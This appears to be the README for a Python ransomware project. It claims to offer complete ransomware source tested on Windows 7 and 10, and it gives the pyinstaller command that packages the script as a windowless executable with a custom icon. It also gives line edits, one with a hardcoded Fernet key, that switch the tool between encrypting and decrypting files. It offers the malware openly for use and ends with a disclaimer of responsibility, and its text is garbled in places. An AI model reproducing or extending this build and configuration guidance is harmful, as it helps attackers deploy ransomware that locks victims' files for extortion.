Complete Python RansomeWare Source Code With Full Decoumetions.
____ ____ _ _ ____ ____ _ _ _ _ _ ____ ____ ____ ___ _ _ |__/ |__| |\ | [__ | | |\/| | | | |__| |__/ |___ |__] \_/ | \ | | | \| ___] |__| | | |_|_| | | | \ |___ .| |
About: This is a Classic Example Of RansomWare Written in python.
Tested On: Windows 10 / Windows7
Suport : +Windows7
Date of Publish : 10/31/2019
Went Find out about what is Ransomware
When Find out about what is Ransomware ? -> Click Hare <-
To Convet the .py to exe You can use pyinstaller.
To install pyinstaller: https://www.pyinstaller.org
To Convet .py File to exe : pyinstaller --onefile -w --icon YourIcon.ico Ransomware.py
Change Ransomware.py On line 48 From :

To This :
FileName = loc.Target # File name
Encrypted = loc.FernetM.decrypt(Date) # Channge Encrypt To decrypt tmp Var
And line 27 From this :

to This:
Key = b'68pNFX3kb9GplysL7XKfpdLLhlSrwZFEnFUuy54nEyY # Replace Your Key hare
FKey = Fernet(Key) # Our Fernet Moudle
IM NOT RESBONBLE FOR ANY BAD & MALICIOUS USE OF IT.